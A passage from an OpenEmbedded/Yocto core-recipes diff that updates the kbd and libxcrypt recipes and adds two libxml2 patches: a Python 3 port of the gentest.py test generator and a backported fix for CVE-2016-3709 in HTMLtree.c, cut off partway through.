 	update-rc.d -r ${D} halt start 90 0 .
diff --git a/meta/recipes-core/kbd/kbd_2.2.0.bb b/meta/recipes-core/kbd/kbd_2.2.0.bb
index e5700ff57f..d10c93dfb7 100644
--- a/meta/recipes-core/kbd/kbd_2.2.0.bb
+++ b/meta/recipes-core/kbd/kbd_2.2.0.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Keytable files and keyboard utilities"
 HOMEPAGE = "http://www.kbd-project.org/"
+DESCRIPTION = "The kbd project contains tools for managing Linux console (Linux console, virtual terminals, keyboard, etc.) – mainly, what they do is loading console fonts and keyboard maps."
 # everything minus console-fonts is GPLv2+
 LICENSE = "GPLv2+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=892f569a555ba9c07a568a7c0c4fa63a"
diff --git a/meta/recipes-core/libxcrypt/libxcrypt.inc b/meta/recipes-core/libxcrypt/libxcrypt.inc
index 2d2a0b03e3..b6bf48ba79 100644
--- a/meta/recipes-core/libxcrypt/libxcrypt.inc
+++ b/meta/recipes-core/libxcrypt/libxcrypt.inc
@@ -9,7 +9,7 @@ LIC_FILES_CHKSUM ?= "file://LICENSING;md5=3bb6614cf5880cbf1b9dbd9e3d145e2c \
 
 inherit autotools pkgconfig
 
-SRC_URI = "git://github.com/besser82/libxcrypt.git;branch=${SRCBRANCH}"
+SRC_URI = "git://github.com/besser82/libxcrypt.git;branch=${SRCBRANCH};protocol=https"
 SRCREV = "823437d015cd4ab4d100ed205f218681b03ae45c"
 SRCBRANCH ?= "develop"
 
diff --git a/meta/recipes-core/libxml/libxml2/0001-Port-gentest.py-to-Python-3.patch b/meta/recipes-core/libxml/libxml2/0001-Port-gentest.py-to-Python-3.patch
new file mode 100644
index 0000000000..b0d26d1c08
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/0001-Port-gentest.py-to-Python-3.patch
@@ -0,0 +1,813 @@
+From b5125000917810731bc28055c0445d571121f80e Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Thu, 21 Apr 2022 00:45:58 +0200
+Subject: [PATCH] Port gentest.py to Python 3
+
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/343fc1421cdae097fa6c4cffeb1a065a40be6bbb]
+
+* fixes:
+
+make[1]: 'testReader' is up to date.
+  File "../libxml2-2.9.10/gentest.py", line 11
+    print "libxml2 python bindings not available, skipping testapi.c generation"
+          ^
+SyntaxError: Missing parentheses in call to 'print'. Did you mean print("libxml2 python bindings not available, skipping testapi.c generation")?
+make[1]: [Makefile:2078: testapi.c] Error 1 (ignored)
+
+...
+
+make[1]: 'testReader' is up to date.
+  File "../libxml2-2.9.10/gentest.py", line 271
+    return 1
+           ^
+TabError: inconsistent use of tabs and spaces in indentation
+make[1]: [Makefile:2078: testapi.c] Error 1 (ignored)
+
+...
+
+aarch64-oe-linux-gcc: error: testapi.c: No such file or directory
+aarch64-oe-linux-gcc: fatal error: no input files
+compilation terminated.
+make[1]: *** [Makefile:1275: testapi.o] Error 1
+
+But there is still a bit mystery why it worked before, because check-am
+calls gentest.py with $(PYTHON), so it ignores the shebang in the script
+and libxml2 is using python3native (through python3targetconfig.bbclass)
+so something like:
+
+libxml2/2.9.10-r0/recipe-sysroot-native/usr/bin/python3-native/python3 gentest.py
+
+But that still fails (now without SyntaxError) with:
+libxml2 python bindings not available, skipping testapi.c generation
+
+because we don't have dependency on libxml2-native (to provide libxml2
+python bindings form python3native) and exported PYTHON_SITE_PACKAGES
+might be useless (e.g. /usr/lib/python3.8/site-packages on Ubuntu-22.10
+which uses python 3.10 and there is no site-packages with libxml2)
+
+Signed-off-by: Martin Jansa <Martin.Jansa@gmail.com>
+---
+ gentest.py | 421 ++++++++++++++++++++++++++---------------------------
+ 1 file changed, 209 insertions(+), 212 deletions(-)
+
+diff --git a/gentest.py b/gentest.py
+index b763300..0756706 100755
+--- a/gentest.py
++++ b/gentest.py
+@@ -8,7 +8,7 @@ import string
+ try:
+     import libxml2
+ except:
+-    print "libxml2 python bindings not available, skipping testapi.c generation"
++    print("libxml2 python bindings not available, skipping testapi.c generation")
+     sys.exit(0)
+ 
+ if len(sys.argv) > 1:
+@@ -227,7 +227,7 @@ extra_post_call = {
+           if (old != NULL) {
+               xmlUnlinkNode(old);
+               xmlFreeNode(old) ; old = NULL ; }
+-	  ret_val = NULL;""",
++\t  ret_val = NULL;""",
+    "xmlTextMerge": 
+        """if ((first != NULL) && (first->type != XML_TEXT_NODE)) {
+               xmlUnlinkNode(second);
+@@ -236,7 +236,7 @@ extra_post_call = {
+        """if ((ret_val != NULL) && (ret_val != ncname) &&
+               (ret_val != prefix) && (ret_val != memory))
+               xmlFree(ret_val);
+-	  ret_val = NULL;""",
++\t  ret_val = NULL;""",
+    "xmlNewDocElementContent":
+        """xmlFreeDocElementContent(doc, ret_val); ret_val = NULL;""",
+    "xmlDictReference": "xmlDictFree(dict);",
+@@ -268,29 +268,29 @@ modules = []
+ def is_skipped_module(name):
+     for mod in skipped_modules:
+         if mod == name:
+-	    return 1
++            return 1
+     return 0
+ 
+ def is_skipped_function(name):
+     for fun in skipped_functions:
+         if fun == name:
+-	    return 1
++            return 1
+     # Do not test destructors
+-    if string.find(name, 'Free') != -1:
++    if name.find('Free') != -1:
+         return 1
+     return 0
+ 
+ def is_skipped_memcheck(name):
+     for fun in skipped_memcheck:
+         if fun == name:
+-	    return 1
++            return 1
+     return 0
+ 
+ missing_types = {}
+ def add_missing_type(name, func):
+     try:
+         list = missing_types[name]
+-	list.append(func)
++        list.append(func)
+     except:
+         missing_types[name] = [func]
+ 
+@@ -310,7 +310,7 @@ def add_missing_functions(name, module):
+     missing_functions_nr = missing_functions_nr + 1
+     try:
+         list = missing_functions[module]
+-	list.append(name)
++        list.append(name)
+     except:
+         missing_functions[module] = [name]
+ 
+@@ -319,45 +319,45 @@ def add_missing_functions(name, module):
+ #
+ 
+ def type_convert(str, name, info, module, function, pos):
+-#    res = string.replace(str, "    ", " ")
+-#    res = string.replace(str, "   ", " ")
+-#    res = string.replace(str, "  ", " ")
+-    res = string.replace(str, " *", "_ptr")
+-#    res = string.replace(str, "*", "_ptr")
+-    res = string.replace(res, " ", "_")
++#    res = str.replace("    ", " ")
++#    res = str.replace("   ", " ")
++#    res = str.replace("  ", " ")
++    res = str.replace(" *", "_ptr")
++#    res = str.replace("*", "_ptr")
++    res = res.replace(" ", "_")
+     if res == 'const_char_ptr':
+-        if string.find(name, "file") != -1 or \
+-           string.find(name, "uri") != -1 or \
+-           string.find(name, "URI") != -1 or \
+-           string.find(info, "filename") != -1 or \
+-           string.find(info, "URI") != -1 or \
+-           string.find(info, "URL") != -1:
+-	    if string.find(function, "Save") != -1 or \
+-	       string.find(function, "Create") != -1 or \
+-	       string.find(function, "Write") != -1 or \
+-	       string.find(function, "Fetch") != -1:
+-	        return('fileoutput')
+-	    return('filepath')
++        if name.find("file") != -1 or \
++           name.find("uri") != -1 or \
++           name.find("URI") != -1 or \
++           info.find("filename") != -1 or \
++           info.find("URI") != -1 or \
++           info.find("URL") != -1:
++            if function.find("Save") != -1 or \
++               function.find("Create") != -1 or \
++               function.find("Write") != -1 or \
++               function.find("Fetch") != -1:
++                return('fileoutput')
++            return('filepath')
+     if res == 'void_ptr':
+         if module == 'nanoftp' and name == 'ctx':
+-	    return('xmlNanoFTPCtxtPtr')
++            return('xmlNanoFTPCtxtPtr')
+         if function == 'xmlNanoFTPNewCtxt' or \
+-	   function == 'xmlNanoFTPConnectTo' or \
+-	   function == 'xmlNanoFTPOpen':
+-	    return('xmlNanoFTPCtxtPtr')
++           function == 'xmlNanoFTPConnectTo' or \
++           function == 'xmlNanoFTPOpen':
++            return('xmlNanoFTPCtxtPtr')
+         if module == 'nanohttp' and name == 'ctx':
+-	    return('xmlNanoHTTPCtxtPtr')
+-	if function == 'xmlNanoHTTPMethod' or \
+-	   function == 'xmlNanoHTTPMethodRedir' or \
+-	   function == 'xmlNanoHTTPOpen' or \
+-	   function == 'xmlNanoHTTPOpenRedir':
+-	    return('xmlNanoHTTPCtxtPtr');
++            return('xmlNanoHTTPCtxtPtr')
++        if function == 'xmlNanoHTTPMethod' or \
++           function == 'xmlNanoHTTPMethodRedir' or \
++           function == 'xmlNanoHTTPOpen' or \
++           function == 'xmlNanoHTTPOpenRedir':
++            return('xmlNanoHTTPCtxtPtr');
+         if function == 'xmlIOHTTPOpen':
+-	    return('xmlNanoHTTPCtxtPtr')
+-	if string.find(name, "data") != -1:
+-	    return('userdata')
+-	if string.find(name, "user") != -1:
+-	    return('userdata')
++            return('xmlNanoHTTPCtxtPtr')
++        if name.find("data") != -1:
++            return('userdata')
++        if name.find("user") != -1:
++            return('userdata')
+     if res == 'xmlDoc_ptr':
+         res = 'xmlDocPtr'
+     if res == 'xmlNode_ptr':
+@@ -366,18 +366,18 @@ def type_convert(str, name, info, module, function, pos):
+         res = 'xmlDictPtr'
+     if res == 'xmlNodePtr' and pos != 0:
+         if (function == 'xmlAddChild' and pos == 2) or \
+-	   (function == 'xmlAddChildList' and pos == 2) or \
++           (function == 'xmlAddChildList' and pos == 2) or \
+            (function == 'xmlAddNextSibling' and pos == 2) or \
+            (function == 'xmlAddSibling' and pos == 2) or \
+            (function == 'xmlDocSetRootElement' and pos == 2) or \
+            (function == 'xmlReplaceNode' and pos == 2) or \
+            (function == 'xmlTextMerge') or \
+-	   (function == 'xmlAddPrevSibling' and pos == 2):
+-	    return('xmlNodePtr_in');
++           (function == 'xmlAddPrevSibling' and pos == 2):
++            return('xmlNodePtr_in');
+     if res == 'const xmlBufferPtr':
+         res = 'xmlBufferPtr'
+     if res == 'xmlChar_ptr' and name == 'name' and \
+-       string.find(function, "EatName") != -1:
++       function.find("EatName") != -1:
+         return('eaten_name')
+     if res == 'void_ptr*':
+         res = 'void_ptr_ptr'
+@@ -393,7 +393,7 @@ def type_convert(str, name, info, module, function, pos):
+         res = 'debug_FILE_ptr';
+     if res == 'int' and name == 'options':
+         if module == 'parser' or module == 'xmlreader':
+-	    res = 'parseroptions'
++            res = 'parseroptions'
+ 
+     return res
+ 
+@@ -402,28 +402,28 @@ known_param_types = []
+ def is_known_param_type(name):
+     for type in known_param_types:
+         if type == name:
+-	    return 1
++            return 1
+     return name[-3:] == 'Ptr' or name[-4:] == '_ptr'
+ 
+ def generate_param_type(name, rtype):
+     global test
+     for type in known_param_types:
+         if type == name:
+-	    return
++            return
+     for type in generated_param_types:
+         if type == name:
+-	    return
++            return
+ 
+     if name[-3:] == 'Ptr' or name[-4:] == '_ptr':
+         if rtype[0:6] == 'const ':
+-	    crtype = rtype[6:]
+-	else:
+-	    crtype = rtype
++            crtype = rtype[6:]
++        else:
++            crtype = rtype
+ 
+         define = 0
+-	if modules_defines.has_key(module):
+-	    test.write("#ifdef %s\n" % (modules_defines[module]))
+-	    define = 1
++        if module in modules_defines:
++            test.write("#ifdef %s\n" % (modules_defines[module]))
++            define = 1
+         test.write("""
+ #define gen_nb_%s 1
+ static %s gen_%s(int no ATTRIBUTE_UNUSED, int nr ATTRIBUTE_UNUSED) {
+@@ -433,7 +433,7 @@ static void des_%s(int no ATTRIBUTE_UNUSED, %s val ATTRIBUTE_UNUSED, int nr ATTR
+ }
+ """ % (name, crtype, name, name, rtype))
+         if define == 1:
+-	    test.write("#endif\n\n")
++            test.write("#endif\n\n")
+         add_generated_param_type(name)
+ 
+ #
+@@ -445,7 +445,7 @@ known_return_types = []
+ def is_known_return_type(name):
+     for type in known_return_types:
+         if type == name:
+-	    return 1
++            return 1
+     return 0
+ 
+ #
+@@ -471,7 +471,7 @@ def compare_and_save():
+         try:
+             os.system("rm testapi.c; mv testapi.c.new testapi.c")
+         except:
+-	    os.system("mv testapi.c.new testapi.c")
++            os.system("mv testapi.c.new testapi.c")
+         print("Updated testapi.c")
+     else:
+         print("Generated testapi.c is identical")
+@@ -481,17 +481,17 @@ while line != "":
+     if line == "/* CUT HERE: everything below that line is generated */\n":
+         break;
+     if line[0:15] == "#define gen_nb_":
+-        type = string.split(line[15:])[0]
+-	known_param_types.append(type)
++        type = line[15:].split()[0]
++        known_param_types.append(type)
+     if line[0:19] == "static void desret_":
+-        type = string.split(line[19:], '(')[0]
+-	known_return_types.append(type)
++        type = line[19:].split('(')[0]
++        known_return_types.append(type)
+     test.write(line)
+     line = input.readline()
+ input.close()
+ 
+ if line == "":
+-    print "Could not find the CUT marker in testapi.c skipping generation"
++    print("Could not find the CUT marker in testapi.c skipping generation")
+     test.close()
+     sys.exit(0)
+ 
+@@ -505,7 +505,7 @@ test.write("/* CUT HERE: everything below that line is generated */\n")
+ #
+ doc = libxml2.readFile(srcPref + 'doc/libxml2-api.xml', None, 0)
+ if doc == None:
+-    print "Failed to load doc/libxml2-api.xml"
++    print("Failed to load doc/libxml2-api.xml")
+     sys.exit(1)
+ ctxt = doc.xpathNewContext()
+ 
+@@ -519,9 +519,9 @@ for arg in args:
+     mod = arg.xpathEval('string(../@file)')
+     func = arg.xpathEval('string(../@name)')
+     if (mod not in skipped_modules) and (func not in skipped_functions):
+-	type = arg.xpathEval('string(@type)')
+-	if not argtypes.has_key(type):
+-	    argtypes[type] = func
++        type = arg.xpathEval('string(@type)')
++        if type not in argtypes:
++            argtypes[type] = func
+ 
+ # similarly for return types
+ rettypes = {}
+@@ -531,8 +531,8 @@ for ret in rets:
+     func = ret.xpathEval('string(../@name)')
+     if (mod not in skipped_modules) and (func not in skipped_functions):
+         type = ret.xpathEval('string(@type)')
+-	if not rettypes.has_key(type):
+-	    rettypes[type] = func
++        if type not in rettypes:
++            rettypes[type] = func
+ 
+ #
+ # Generate constructors and return type handling for all enums
+@@ -549,49 +549,49 @@ for enum in enums:
+         continue;
+     define = 0
+ 
+-    if argtypes.has_key(name) and is_known_param_type(name) == 0:
+-	values = ctxt.xpathEval("/api/symbols/enum[@type='%s']" % name)
+-	i = 0
+-	vals = []
+-	for value in values:
+-	    vname = value.xpathEval('string(@name)')
+-	    if vname == None:
+-		continue;
+-	    i = i + 1
+-	    if i >= 5:
+-		break;
+-	    vals.append(vname)
+-	if vals == []:
+-	    print "Didn't find any value for enum %s" % (name)
+-	    continue
+-	if modules_defines.has_key(module):
+-	    test.write("#ifdef %s\n" % (modules_defines[module]))
+-	    define = 1
+-	test.write("#define gen_nb_%s %d\n" % (name, len(vals)))
+-	test.write("""static %s gen_%s(int no, int nr ATTRIBUTE_UNUSED) {\n""" %
+-	           (name, name))
+-	i = 1
+-	for value in vals:
+-	    test.write("    if (no == %d) return(%s);\n" % (i, value))
+-	    i = i + 1
+-	test.write("""    return(0);
++    if (name in argtypes) and is_known_param_type(name) == 0:
++        values = ctxt.xpathEval("/api/symbols/enum[@type='%s']" % name)
++        i = 0
++        vals = []
++        for value in values:
++            vname = value.xpathEval('string(@name)')
++            if vname == None:
++                continue;
++            i = i + 1
++            if i >= 5:
++                break;
++            vals.append(vname)
++        if vals == []:
++            print("Didn't find any value for enum %s" % (name))
++            continue
++        if module in modules_defines:
++            test.write("#ifdef %s\n" % (modules_defines[module]))
++            define = 1
++        test.write("#define gen_nb_%s %d\n" % (name, len(vals)))
++        test.write("""static %s gen_%s(int no, int nr ATTRIBUTE_UNUSED) {\n""" %
++                   (name, name))
++        i = 1
++        for value in vals:
++            test.write("    if (no == %d) return(%s);\n" % (i, value))
++            i = i + 1
++        test.write("""    return(0);
+ }
+ 
+ static void des_%s(int no ATTRIBUTE_UNUSED, %s val ATTRIBUTE_UNUSED, int nr ATTRIBUTE_UNUSED) {
+ }
+ 
+ """ % (name, name));
+-	known_param_types.append(name)
++        known_param_types.append(name)
+ 
+     if (is_known_return_type(name) == 0) and (name in rettypes):
+-	if define == 0 and modules_defines.has_key(module):
+-	    test.write("#ifdef %s\n" % (modules_defines[module]))
+-	    define = 1
++        if define == 0 and (module in modules_defines):
++            test.write("#ifdef %s\n" % (modules_defines[module]))
++            define = 1
+         test.write("""static void desret_%s(%s val ATTRIBUTE_UNUSED) {
+ }
+ 
+ """ % (name, name))
+-	known_return_types.append(name)
++        known_return_types.append(name)
+     if define == 1:
+         test.write("#endif\n\n")
+ 
+@@ -615,9 +615,9 @@ for file in headers:
+     # do not test deprecated APIs
+     #
+     desc = file.xpathEval('string(description)')
+-    if string.find(desc, 'DEPRECATED') != -1:
+-        print "Skipping deprecated interface %s" % name
+-	continue;
++    if desc.find('DEPRECATED') != -1:
++        print("Skipping deprecated interface %s" % name)
++        continue;
+ 
+     test.write("#include <libxml/%s.h>\n" % name)
+     modules.append(name)
+@@ -679,7 +679,7 @@ def generate_test(module, node):
+     # and store the informations for the generation
+     #
+     try:
+-	args = node.xpathEval("arg")
++        args = node.xpathEval("arg")
+     except:
+         args = []
+     t_args = []
+@@ -687,37 +687,37 @@ def generate_test(module, node):
+     for arg in args:
+         n = n + 1
+         rtype = arg.xpathEval("string(@type)")
+-	if rtype == 'void':
+-	    break;
+-	info = arg.xpathEval("string(@info)")
+-	nam = arg.xpathEval("string(@name)")
++        if rtype == 'void':
++            break;
++        info = arg.xpathEval("string(@info)")
++        nam = arg.xpathEval("string(@name)")
+         type = type_convert(rtype, nam, info, module, name, n)
+-	if is_known_param_type(type) == 0:
+-	    add_missing_type(type, name);
+-	    no_gen = 1
++        if is_known_param_type(type) == 0:
++            add_missing_type(type, name);
++            no_gen = 1
+         if (type[-3:] == 'Ptr' or type[-4:] == '_ptr') and \
+-	    rtype[0:6] == 'const ':
+-	    crtype = rtype[6:]
+-	else:
+-	    crtype = rtype
+-	t_args.append((nam, type, rtype, crtype, info))
++            rtype[0:6] == 'const ':
++            crtype = rtype[6:]
++        else:
++            crtype = rtype
++        t_args.append((nam, type, rtype, crtype, info))
+     
+     try:
+-	rets = node.xpathEval("return")
++        rets = node.xpathEval("return")
+     except:
+         rets = []
+     t_ret = None
+     for ret in rets:
+         rtype = ret.xpathEval("string(@type)")
+-	info = ret.xpathEval("string(@info)")
++        info = ret.xpathEval("string(@info)")
+         type = type_convert(rtype, 'return', info, module, name, 0)
+-	if rtype == 'void':
+-	    break
+-	if is_known_return_type(type) == 0:
+-	    add_missing_type(type, name);
+-	    no_gen = 1
+-	t_ret = (type, rtype, info)
+-	break
++        if rtype == 'void':
++            break
++        if is_known_return_type(type) == 0:
++            add_missing_type(type, name);
++            no_gen = 1
++        t_ret = (type, rtype, info)
++        break
+ 
+     if no_gen == 0:
+         for t_arg in t_args:
+@@ -733,7 +733,7 @@ test_%s(void) {
+ 
+     if no_gen == 1:
+         add_missing_functions(name, module)
+-	test.write("""
++        test.write("""
+     /* missing type support */
+     return(test_ret);
+ }
+@@ -742,22 +742,22 @@ test_%s(void) {
+         return
+ 
+     try:
+-	conds = node.xpathEval("cond")
+-	for cond in conds:
+-	    test.write("#if %s\n" % (cond.get_content()))
+-	    nb_cond = nb_cond + 1
++        conds = node.xpathEval("cond")
++        for cond in conds:
++            test.write("#if %s\n" % (cond.get_content()))
++            nb_cond = nb_cond + 1
+     except:
+         pass
+ 
+     define = 0
+-    if function_defines.has_key(name):
++    if name in function_defines:
+         test.write("#ifdef %s\n" % (function_defines[name]))
+-	define = 1
++        define = 1
+     
+     # Declare the memory usage counter
+     no_mem = is_skipped_memcheck(name)
+     if no_mem == 0:
+-	test.write("    int mem_base;\n");
++        test.write("    int mem_base;\n");
+ 
+     # Declare the return value
+     if t_ret != None:
+@@ -766,29 +766,29 @@ test_%s(void) {
+     # Declare the arguments
+     for arg in t_args:
+         (nam, type, rtype, crtype, info) = arg;
+-	# add declaration
+-	test.write("    %s %s; /* %s */\n" % (crtype, nam, info))
+-	test.write("    int n_%s;\n" % (nam))
++        # add declaration
++        test.write("    %s %s; /* %s */\n" % (crtype, nam, info))
++        test.write("    int n_%s;\n" % (nam))
+     test.write("\n")
+ 
+     # Cascade loop on of each argument list of values
+     for arg in t_args:
+         (nam, type, rtype, crtype, info) = arg;
+-	#
+-	test.write("    for (n_%s = 0;n_%s < gen_nb_%s;n_%s++) {\n" % (
+-	           nam, nam, type, nam))
++        #
++        test.write("    for (n_%s = 0;n_%s < gen_nb_%s;n_%s++) {\n" % (
++                   nam, nam, type, nam))
+     
+     # log the memory usage
+     if no_mem == 0:
+-	test.write("        mem_base = xmlMemBlocks();\n");
++        test.write("        mem_base = xmlMemBlocks();\n");
+ 
+     # prepare the call
+     i = 0;
+     for arg in t_args:
+         (nam, type, rtype, crtype, info) = arg;
+-	#
+-	test.write("        %s = gen_%s(n_%s, %d);\n" % (nam, type, nam, i))
+-	i = i + 1;
++        #
++        test.write("        %s = gen_%s(n_%s, %d);\n" % (nam, type, nam, i))
++        i = i + 1;
+ 
+     # add checks to avoid out-of-bounds array access
+     i = 0;
+@@ -797,7 +797,7 @@ test_%s(void) {
+         # assume that "size", "len", and "start" parameters apply to either
+         # the nearest preceding or following char pointer
+         if type == "int" and (nam == "size" or nam == "len" or nam == "start"):
+-            for j in range(i - 1, -1, -1) + range(i + 1, len(t_args)):
++            for j in (*range(i - 1, -1, -1), *range(i + 1, len(t_args))):
+                 (bnam, btype) = t_args[j][:2]
+                 if btype == "const_char_ptr" or btype == "const_xmlChar_ptr":
+                     test.write(
+@@ -806,42 +806,42 @@ test_%s(void) {
+                         "            continue;\n"
+                         % (bnam, nam, bnam))
+                     break
+-	i = i + 1;
++        i = i + 1;
+ 
+     # do the call, and clanup the result
+-    if extra_pre_call.has_key(name):
+-	test.write("        %s\n"% (extra_pre_call[name]))
++    if name in extra_pre_call:
++        test.write("        %s\n"% (extra_pre_call[name]))
+     if t_ret != None:
+-	test.write("\n        ret_val = %s(" % (name))
+-	need = 0
+-	for arg in t_args:
+-	    (nam, type, rtype, crtype, info) = arg
+-	    if need:
+-	        test.write(", ")
+-	    else:
+-	        need = 1
+-	    if rtype != crtype:
+-	        test.write("(%s)" % rtype)
+-	    test.write("%s" % nam);
+-	test.write(");\n")
+-	if extra_post_call.has_key(name):
+-	    test.write("        %s\n"% (extra_post_call[name]))
+-	test.write("        desret_%s(ret_val);\n" % t_ret[0])
++        test.write("\n        ret_val = %s(" % (name))
++        need = 0
++        for arg in t_args:
++            (nam, type, rtype, crtype, info) = arg
++            if need:
++                test.write(", ")
++            else:
++                need = 1
++            if rtype != crtype:
++                test.write("(%s)" % rtype)
++            test.write("%s" % nam);
++        test.write(");\n")
++        if name in extra_post_call:
++            test.write("        %s\n"% (extra_post_call[name]))
++        test.write("        desret_%s(ret_val);\n" % t_ret[0])
+     else:
+-	test.write("\n        %s(" % (name));
+-	need = 0;
+-	for arg in t_args:
+-	    (nam, type, rtype, crtype, info) = arg;
+-	    if need:
+-	        test.write(", ")
+-	    else:
+-	        need = 1
+-	    if rtype != crtype:
+-	        test.write("(%s)" % rtype)
+-	    test.write("%s" % nam)
+-	test.write(");\n")
+-	if extra_post_call.has_key(name):
+-	    test.write("        %s\n"% (extra_post_call[name]))
++        test.write("\n        %s(" % (name));
++        need = 0;
++        for arg in t_args:
++            (nam, type, rtype, crtype, info) = arg;
++            if need:
++                test.write(", ")
++            else:
++                need = 1
++            if rtype != crtype:
++                test.write("(%s)" % rtype)
++            test.write("%s" % nam)
++        test.write(");\n")
++        if name in extra_post_call:
++            test.write("        %s\n"% (extra_post_call[name]))
+ 
+     test.write("        call_tests++;\n");
+ 
+@@ -849,32 +849,32 @@ test_%s(void) {
+     i = 0;
+     for arg in t_args:
+         (nam, type, rtype, crtype, info) = arg;
+-	# This is a hack to prevent generating a destructor for the
+-	# 'input' argument in xmlTextReaderSetup.  There should be
+-	# a better, more generic way to do this!
+-	if string.find(info, 'destroy') == -1:
+-	    test.write("        des_%s(n_%s, " % (type, nam))
+-	    if rtype != crtype:
+-	        test.write("(%s)" % rtype)
+-	    test.write("%s, %d);\n" % (nam, i))
+-	i = i + 1;
++        # This is a hack to prevent generating a destructor for the
++        # 'input' argument in xmlTextReaderSetup.  There should be
++        # a better, more generic way to do this!
++        if info.find('destroy') == -1:
++            test.write("        des_%s(n_%s, " % (type, nam))
++            if rtype != crtype:
++                test.write("(%s)" % rtype)
++            test.write("%s, %d);\n" % (nam, i))
++        i = i + 1;
+ 
+     test.write("        xmlResetLastError();\n");
+     # Check the memory usage
+     if no_mem == 0:
+-	test.write("""        if (mem_base != xmlMemBlocks()) {
++        test.write("""        if (mem_base != xmlMemBlocks()) {
+             printf("Leak of %%d blocks found in %s",
+-	           xmlMemBlocks() - mem_base);
+-	    test_ret++;
++\t           xmlMemBlocks() - mem_base);
++\t    test_ret++;
+ """ % (name));
+-	for arg in t_args:
+-	    (nam, type, rtype, crtype, info) = arg;
+-	    test.write("""            printf(" %%d", n_%s);\n""" % (nam))
+-	test.write("""            printf("\\n");\n""")
+-	test.write("        }\n")
++        for arg in t_args:
++            (nam, type, rtype, crtype, info) = arg;
++            test.write("""            printf(" %%d", n_%s);\n""" % (nam))
++        test.write("""            printf("\\n");\n""")
++        test.write("        }\n")
+ 
+     for arg in t_args:
+-	test.write("    }\n")
++        test.write("    }\n")
+ 
+     test.write("    function_tests++;\n")
+     #
+@@ -882,7 +882,7 @@ test_%s(void) {
+     #
+     while nb_cond > 0:
+         test.write("#endif\n")
+-	nb_cond = nb_cond -1
++        nb_cond = nb_cond -1
+     if define == 1:
+         test.write("#endif\n")
+ 
+@@ -900,10 +900,10 @@ test_%s(void) {
+ for module in modules:
+     # gather all the functions exported by that module
+     try:
+-	functions = ctxt.xpathEval("/api/symbols/function[@file='%s']" % (module))
++        functions = ctxt.xpathEval("/api/symbols/function[@file='%s']" % (module))
+     except:
+-        print "Failed to gather functions from module %s" % (module)
+-	continue;
++        print("Failed to gather functions from module %s" % (module))
++        continue;
+ 
+     # iterate over all functions in the module generating the test
+     i = 0
+@@ -923,14 +923,14 @@ test_%s(void) {
+     # iterate over all functions in the module generating the call
+     for function in functions:
+         name = function.xpathEval('string(@name)')
+-	if is_skipped_function(name):
+-	    continue
+-	test.write("    test_ret += test_%s();\n" % (name))
++        if is_skipped_function(name):
++            continue
++        test.write("    test_ret += test_%s();\n" % (name))
+ 
+     # footer
+     test.write("""
+     if (test_ret != 0)
+-	printf("Module %s: %%d errors\\n", test_ret);
++\tprintf("Module %s: %%d errors\\n", test_ret);
+     return(test_ret);
+ }
+ """ % (module))
+@@ -948,7 +948,7 @@ test.write("""    return(0);
+ }
+ """);
+ 
+-print "Generated test for %d modules and %d functions" %(len(modules), nb_tests)
++print("Generated test for %d modules and %d functions" %(len(modules), nb_tests))
+ 
+ compare_and_save()
+ 
+@@ -960,11 +960,8 @@ for missing in missing_types.keys():
+     n = len(missing_types[missing])
+     missing_list.append((n, missing))
+ 
+-def compare_missing(a, b):
+-    return b[0] - a[0]
+-
+-missing_list.sort(compare_missing)
+-print "Missing support for %d functions and %d types see missing.lst" % (missing_functions_nr, len(missing_list))
++missing_list.sort(key=lambda a: a[0])
++print("Missing support for %d functions and %d types see missing.lst" % (missing_functions_nr, len(missing_list)))
+ lst = open("missing.lst", "w")
+ lst.write("Missing support for %d types" % (len(missing_list)))
+ lst.write("\n")
+@@ -974,9 +971,9 @@ for miss in missing_list:
+     for n in missing_types[miss[1]]:
+         i = i + 1
+         if i > 5:
+-	    lst.write(" ...")
+-	    break
+-	lst.write(" %s" % (n))
++            lst.write(" ...")
++            break
++        lst.write(" %s" % (n))
+     lst.write("\n")
+ lst.write("\n")
+ lst.write("\n")
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2016-3709.patch b/meta/recipes-core/libxml/libxml2/CVE-2016-3709.patch
new file mode 100644
index 0000000000..5301d05323
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2016-3709.patch
@@ -0,0 +1,89 @@
+From c1ba6f54d32b707ca6d91cb3257ce9de82876b6f Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Sat, 15 Aug 2020 18:32:29 +0200
+Subject: [PATCH] Revert "Do not URI escape in server side includes"
+
+This reverts commit 960f0e275616cadc29671a218d7fb9b69eb35588.
+
+This commit introduced
+
+- an infinite loop, found by OSS-Fuzz, which could be easily fixed.
+- an algorithm with quadratic runtime
+- a security issue, see
+  https://bugzilla.gnome.org/show_bug.cgi?id=769760
+
+A better approach is to add an option not to escape URLs at all
+which libxml2 should have possibly done in the first place.
+
+CVE: CVE-2016-3709
+Upstream-Status: Backport [https://github.com/GNOME/libxml2/commit/c1ba6f54d32b707ca6d91cb3257ce9de82876b6f]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+---
+ HTMLtree.c | 49 +++++++++++--------------------------------------
+ 1 file changed, 11 insertions(+), 38 deletions(-)
+
+diff --git a/HTMLtree.c b/HTMLtree.c
+index 8d236bb35..cdb7f86a6 100644
+--- a/HTMLtree.c
++++ b/HTMLtree.c
+@@ -706,49 +706,22 @@ htmlAttrDumpOutput(xmlOutputBufferPtr buf, xmlDocPtr doc, xmlAttrPtr cur,
+ 		 (!xmlStrcasecmp(cur->name, BAD_CAST "src")) ||
+ 		 ((!xmlStrcasecmp(cur->name, BAD_CAST "name")) &&
+ 		  (!xmlStrcasecmp(cur->parent->name, BAD_CAST "a"))))) {
++		xmlChar *escaped;
+ 		xmlChar *tmp = value;
+-		/* xmlURIEscapeStr() escapes '"' so it can be safely used. */
+-		xmlBufCCat(buf->buffer, "\"");
+
+ 		while (IS_BLANK_CH(*tmp)) tmp++;
+
+-		/* URI Escape everything, except server side includes. */
+-		for ( ; ; ) {
+-		    xmlChar *escaped;
+-		    xmlChar endChar;
+-		    xmlChar *end = NULL;
+-		    xmlChar *start = (xmlChar *)xmlStrstr(tmp, BAD_CAST "<!--");
+-		    if (start != NULL) {
+-			end = (xmlChar *)xmlStrstr(tmp, BAD_CAST "-->");
